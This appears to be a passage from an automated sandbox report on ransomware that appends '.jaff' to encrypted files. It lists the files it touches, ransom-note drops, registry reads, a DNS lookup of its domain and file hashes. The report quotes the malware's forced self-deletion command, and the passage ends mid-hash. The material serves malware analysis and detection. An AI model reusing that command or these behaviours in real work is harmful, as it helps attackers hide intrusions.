File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-applemenu.xml.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\MEDIA\SUCTION.WAV.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21311_.GIF.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21331_.GIF.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\Certificates\groove.net\ManagedObjects\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Horizon.xml.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\winsxs\x86_microsoft-windows-wwfcorecomp.resources_31bf3856ad364e35_6.1.7600.16385_de-de_1248d52c93fe6e31\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\x86_netfx-aspnet_webmintrust_config_b03f5f7f11d50a3a_6.1.7600.16385_none_b724a267c2ccea7a\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\Microsoft.NET\Framework\v2.0.50727\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-l..fessional.resources_31bf3856ad364e35_6.1.7600.16385_en-us_83a96f16be1ecf82\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-l..t-starter.resources_31bf3856ad364e35_6.1.7601.17514_it-it_9aff0a0726ff98b6\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-l..ultimaten.resources_31bf3856ad364e35_6.1.7600.16385_de-de_e73ca319a82aa327\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-b..isc-tools.resources_31bf3856ad364e35_6.1.7600.16385_en-us_e31d2d92828b5ec3\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-gadgets-cpu.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_efed75e2fbac9517\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-l..-ultimate.resources_31bf3856ad364e35_6.1.7601.17514_it-it_068a8aa70d654920\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\NetFx40_IIS_schema_update.xml.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-l..ultimaten.resources_31bf3856ad364e35_6.1.7601.17514_en-us_91a2a3662d8ffd41\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SetupCache\v4.7.03062\1041\eula.rtf.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\diagnostics\index\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-g..-currency.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_5c4791cafd126e03\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-s..soundthemes-savanna_31bf3856ad364e35_6.1.7600.16385_none_8501e89d0b011992\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\amd64_netfx-aspnet_common_sql_b03f5f7f11d50a3a_6.1.7600.16385_none_9b5d3c5138868587\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-l..essionaln.resources_31bf3856ad364e35_6.1.7601.17514_es-es_2db40b99b2736660\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-l..homebasic.resources_31bf3856ad364e35_6.1.7601.17514_it-it_cb41e15d1e0fe8c0\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-l..omebasicn.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_be5cbd3b6b3e4c5c\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\Microsoft.NET\Framework\v3.5\SQL\es\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework\v3.5\DataSvcUtil.exe.config.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe.config.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-l..nterprise.resources_31bf3856ad364e35_6.1.7601.17514_fr-fr_289b855890d86e62\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\wow64_microsoft-windows-i..lprovider.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_25d4ec0b90e21a29\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-l..-ultimate.resources_31bf3856ad364e35_6.1.7601.17514_it-it_dd8dde728f4e7060\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SetupCache\v4.7.03062\Graphics\Rotate8.ico.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\x86_netfx-weblowtrust_config_b03f5f7f11d50a3a_6.1.7600.16385_none_b282c116d6e6d47e\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\Speech\Engines\SR\ja-JP\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-ie-antiphishfilter_31bf3856ad364e35_11.2.9600.16428_none_dde9296580ccbddf\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-l..ultimatee.resources_31bf3856ad364e35_6.1.7601.17514_fr-fr_eee4e052cd1adbab\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-s..-soundthemes-garden_31bf3856ad364e35_6.1.7600.16385_none_f7a4bf1e15863e21\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-w..for-management-core_31bf3856ad364e35_6.1.7601.17514_none_288b7acec3a75696\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-xwizards_31bf3856ad364e35_6.1.7600.16385_none_77fe6053a02b5dc7\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-fax-common.resources_31bf3856ad364e35_6.1.7600.16385_de-de_fcb2dd5d6182f5ae\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-l..omebasice.resources_31bf3856ad364e35_6.1.7600.16385_de-de_61da96604705f464\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-l..terprisen.resources_31bf3856ad364e35_6.1.7601.17514_en-us_1aca4d46a08df107\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe.config.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-l..ultimatee.resources_31bf3856ad364e35_6.1.7600.16385_es-es_bc7b845ad586d402\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-l..omebasice.resources_31bf3856ad364e35_6.1.7600.16385_it-it_c1ae04d6b2f5d213\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-l..terprisen.resources_31bf3856ad364e35_6.1.7601.17514_de-de_71d9774db1afe542\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-l..-lpksetup.resources_31bf3856ad364e35_6.1.7601.17514_de-de_559eb6a7b33ef039\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\legacy.web_minimaltrust.config.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\web.config.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Windows\inf\PERFLIB\0409\perfh.dat.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-l..terprisee.resources_31bf3856ad364e35_6.1.7601.17514_de-de_8d33546de1c5ef03\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-powerdiagnostic_31bf3856ad364e35_6.1.7600.16385_none_9654ef966755d06f\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-s..l-wallpaper-starter_31bf3856ad364e35_6.1.7600.16385_none_f08164982f2fecda\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\amd64_netfx-machine_config_ocm_b03f5f7f11d50a3a_6.1.7601.17514_none_81fa0191bdd08961\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-e..eady_eula.resources_31bf3856ad364e35_6.1.7600.16385_es-es_959ec7b53a342ec3\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-l..-ultimate.resources_31bf3856ad364e35_6.1.7600.16385_es-es_e9c2f754efcb477f\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-l..fessional.resources_31bf3856ad364e35_6.1.7601.17514_es-es_f5f7b0a614550298\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-l..m-starter.resources_31bf3856ad364e35_6.1.7601.17514_de-de_8a445b750021d88a\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-l..essionaln.resources_31bf3856ad364e35_6.1.7601.17514_it-it_16b2136334d4d376\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-n..sh-helper.resources_31bf3856ad364e35_6.1.7600.16385_de-de_9b3b900d1741a8cd\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-sonic-symphonyntsc_31bf3856ad364e35_6.1.7600.16385_none_d75d6085d60aa50d\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-g..-calendar.resources_31bf3856ad364e35_6.1.7600.16385_en-us_dd95cd2390bb17bc\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-l..-startern.resources_31bf3856ad364e35_6.1.7601.17514_es-es_c82940e03ac63534\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-l..ultimatee.resources_31bf3856ad364e35_6.1.7601.17514_ja-jp_1f13ba22df0a61ce\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\inf\TAPISRV\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework\v4.0.30319\_TransactionBridgePerfCounters.h.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-l..m-starter.resources_31bf3856ad364e35_6.1.7601.17514_es-es_8f1f29d5a784472a\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\amd64_wiabr00a.inf_31bf3856ad364e35_6.1.7600.16385_none_1ff46c750309ff30\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SetupCache\v4.7.03062\1046\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe

"C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C del /Q /F "C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 fkksjobnn43.org udp

Files

C:\Program Files (x86)\Internet Explorer\en-US\ReadMe.html

MD5 b92b5c1b1159a4b56f5ebf5d8112b622
SHA1 5ac4bcd88117003caa5f330c0cde8450252f87cc
SHA256 767b55d49a37655e186ed1b71f69218da846a945ff00e902baa778840dda6736
SHA512 a5599fc6f2330db6c5541ba8af8737b4816dd1171d9d40c6f2404e71754feffd35b34c8c9ae1fbfa88a88810d594da9e0de119342cc5d8e29e66e7ea45de2fdf

C:\Program Files (x86)\Common Files\Services\ReadMe.bmp

MD5 d9d46f5c1d462e6fa986c08b89e8223d
SHA1 e237a3843427f183ac8cbd6ac91c3d53fc0e64dd
SHA256 4036e1539be43744284758f08b6bd8039bcb9ddb12aeff01f8aa2f5619b94268
SHA512 3a6e661e9000ce290f0082838bc6dc33e1d2187aaf6c0c7bf360eec1c0140bb0f00b9283ffc725f85e890e0527651198a3ff8dfb1e68fc09dd1afb0f18fbc226

C:\Program Files (x86)\Internet Explorer\en-US\ReadMe.txt

MD5 cfbd7fa17c72a3b5c84e940dcca2b69d
SHA1 9c7cf35fb08fc0c086cdc64acbb19605e42fbf03
SHA256 ba42b3018667de48aacc23c8a634712907148431998993691296bb1b09818afc
SHA512 cb41f5e7a43879fb2ec495bc8c658c43421da7da271b25c56ec89136ac2723b1a8d2173e65506cf9bd404ca8a22f5945fd11254985c752b722cc79bcb25f5ca5

C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.NO.XML.jaff

MD5 719d2e28cc0eb103a53658c1f7011212
SHA1 92fd0ba6c44c5629990589616883db478086545b
SHA256 c245f3e5643eef8a3204814b4f952513a2d222b88b0ce378e795fde939e37362
SHA512 7bcfb177bc65fcd36f33d5f5bbb65a201f9563012b4c26c803bd6ec062020269c105644ec6cd758f2a5cbab96705af9086a0cc62cf347b668088c4719726ad1c

C:\Windows\SysWOW64\es-ES\ReadMe.bmp.jaff

MD5 4d38dea841ca9f71cb65a019e9176174
SHA1 a9825d4b5e867d374a13203eaff9823049b6f429
SHA256 587b0216fab3da5f24c74804652bdbf3c2d6abc167a7d89df31c8b7f7773a67a
SHA512 affefcbe5c38ffd09a7154f5221841fffdcc4353573457621905c73bcaf618fc7dd998688e9c81e4d6a7d5aa6aac17b205d0c210f7cfad428e48d9f7d458fd85

C:\Windows\SysWOW64\en-US\ReadMe.txt.jaff

MD5 d75f21f4fb4d700f99478a850819d433
SHA1 f733d27085b4f60259b8d90bb6be3915e77681bd
SHA256 73ae60cc2c1db3ee6661a12b456bb6f8318268e12f3aef86656d8d8504f29ef2
SHA512 4e201ca0fa854afca6eed3dd80c2a40d6f50cef757d7985694a661ea5ba6e4b4c0db30ecf38eaeb47b3c5b474f33b73c3734393473a59d6ea4d26746b74666d7

C:\Windows\SysWOW64\fr-FR\ReadMe.html.jaff

MD5 2e911d7e542fa28f0b15844b9bc528ad
SHA1 577c451b2bbfa7d9a805b42271b1f64ed8351517
SHA256 836e86c04d9852a952f7a6ee325a173901ed2a277572fc3602a7a82a76bbb25a
SHA512 ec3279ef4df2f02377d743373ced7bca463dca6a11cdc1fdab7c71a1e5674deb93b10f8b73658dfa651569d89f49aba754c6fdc4c2885102cd13c8e065edf113

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ilasm.exe.config.jaff

MD5 a75eba1447e17b50c9e0f0754784b60a
SHA1 f0bd406c093e8b59d06b17d44e6aad3822c7eae4
SHA256 dee969c26cffcc3c82edb7f93722480fa47b167dae04b27287352ce7d79bd2ad
SHA512 dd942e8fba8517a244def3e92613f9cba7cd801e983c266f35c3a5f5e8d82fb4a46327f0200c6a3cad4e62ed79b99782335b4e565e1e1b81655f25e50ff7c48d

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe.config.jaff

MD5 62da3f21f8e04931ec3f86e8c542c51f
SHA1 9d93a1ff13bef961d3c43e4373beb3f025abfc35
SHA256 7eb9d3bde2e13802a9d2410a7c7dbb7a5e797c8d9a69721488f0d734a4bc2e0f
SHA512 8a4a246be5846946711fc739b9055a22113b7d7336f388ce891b6bef1e1b89743c9f652b4ce3d90494eb00f05fd81e6a910877e32cf3e9862c53fb4d566d5178

C:\Windows\Microsoft.NET\Framework\v4.0.30319\DataSvcUtil.exe.config.jaff

MD5 425c04b51a0f822b6af7ac8b33996cc4
SHA1 25517b380acf31802896d9e89ca71af6c6e1412c
SHA256 3ce3a2e9a8699404d07013bcefc03a2d225fb6d1f41273144f91aaf6e1ccb73a
SHA512 7510057c3a4c5a7b8cb000f912d2f898d9b833b4ee39b46930b1039c59951f7a2011218d00902d8d31b6ab86ff257f8de6bfbe2bfdf52b460e19c3848902bad2

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe.config.jaff

MD5 18fd144384a2d6f9a333900735718877
SHA1 449aa74a92ec3166ca6ac2def916a9cbfbe3cfd5
SHA256 d8d5ed8018b5a260b092fa55ffe93785ccfbc9ab126092e1a81139a871f0119b
SHA512 d71cb68280f8417a928037e0c4e5440e2b6ea9ec98a671476c7fce4a7b9df9fa4457e60fc85c3fc8761f253890ee2feafe4675865692c5b845a4c9a11147c4e2

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe.config.jaff

MD5 d349d0906757d5e13735d96625fcf4fb
SHA1 d5f5c895a6e00e51606124a558ccd6eecb9a0935
SHA256 5e537de45e625976038311ce2d90a1a12284cd3ab4aaf48923e91711cdc0f98b
SHA512 f3fccbe7f1ea7228482161f943678c30c9ffe0c15cba6f5f90fd2aed2a2484fe32b11b582fa62c8cc85aaa3bc3cec69a3d443d8611ef9999e0b3387319f26541

C:\Windows\inf\PERFLIB\0411\perfc.dat.jaff

MD5 91db1195f345f74e19dd6142f58dd92a
SHA1 d516dee4cf8d491e593bd33591e17d641f1fe1e2
SHA256 22f097cbb47c5368ef27cf63489c1e07ebc78dfd2a2678ac43729961b0026972
SHA512 618e69dba5b94f77285d2494926e306f1227c764c612c78c4fd5e40e8f689bf828cf47a2d20bd498eddd3647cf0c67ee0ae8da7d52fbbbced91463918453bdad

C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\GrayCheck\TAB_ON.GIF.jaff

MD5 a6ae0cfbf3eb596a81371089167227ee
SHA1 adff680a7fa080b2ea13224253c15668d4659b90
SHA256 fdf0e2af89ab6a8b65948dbb25ccdeb915fd30431673fd8bb4440e084debd3e5
SHA512 d97944dc1e5cff2fbf2b2e5c1a69a65240926107286e5f492c0810a355c30fe094714c280ed98024790b12115f249935048348a882ba33253370fe03e03173b7

C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SoftBlue\TAB_OFF.GIF.jaff

MD5 05304a96ee2be2cb1fd9eb29ec1278a4
SHA1 c576782af8839787d371b7aa0748e7e81696aff4
SHA256 5889d5d344df5a3caa626d159c7a77e6e55711d5313ca8d58d8ef8971960c7db
SHA512 d409e65b3249ab48d1daf45b8171c14110cac73bb12b4054d5d24db9895d643d8f8043a4f81a8a99af61f48f3ffaad6be3a84a2276146e9bbd833d1b90ee335b

C:\Windows\Microsoft.NET\Framework\v3.5\SQL\es\DropSqlPersistenceProviderLogic.sql.jaff

MD5 52a574894ec27a429adc17be53f4be84
SHA1 fc6ae101209aa25b2fc466191dc1d0dca76fb5b2
SHA256 673d9149f3f18e343ce75402e7bdff10b877963f06ecba4c0b321dcd6d0e4925
SHA512 ccfe74320714ce3ff644c3ef3ce0e1a28fd7ab89fa4f62969c0606f9a372cca68d425db7425b1986e9c03f378648535cffd1efd6461cf1a44ccb5e8f708fd967

C:\Windows\Microsoft.NET\Framework64\v3.5\SQL\de\SqlPersistenceProviderLogic.sql.jaff

MD5 3ad51f035ffa279262656c07de6a5fbb
SHA1 d2251978a502b0df6b70d7f4efe202608a544b3a
SHA256 514c27022884e03c78a8d4ca0b24160362b51c98612cad7c1a4573330c1e7202
SHA512 9311948f4be78c71859eb11e934d87c1b26ecf77ccc048ac86e6f80d583753d9d5e09348bc6ea2070f44d6493e4175a56f6bf51af81444a905e4d819518cf8fc

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ASP.NETWebAdminFiles\Images\selectedTab_1x1.gif.jaff

MD5 e30d4b277a21e0088a76a47193cfbf86
SHA1 7e0e9cae1b58623b909b70623ec5a5bce887b3b4
SHA256 2d01e4dd7e6c291c1a3403de755833a3eef37e4512fccbe9698f72ce96fb9c6c
SHA512 54e5a1d4b055df27d73497084a2e7413a6a7e034da3bafc3df9557692418365ba6d8fc460aa7c38d2166c09c304e5839a80468b5e286ae3c3569ef74e64c4a78

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\selectedTab_rightCorner.gif.jaff

MD5 ec47905ef9b69bb4d2ed683e96428584
SHA1 5b1e55734030c03af0c8eb1911828440cf719576
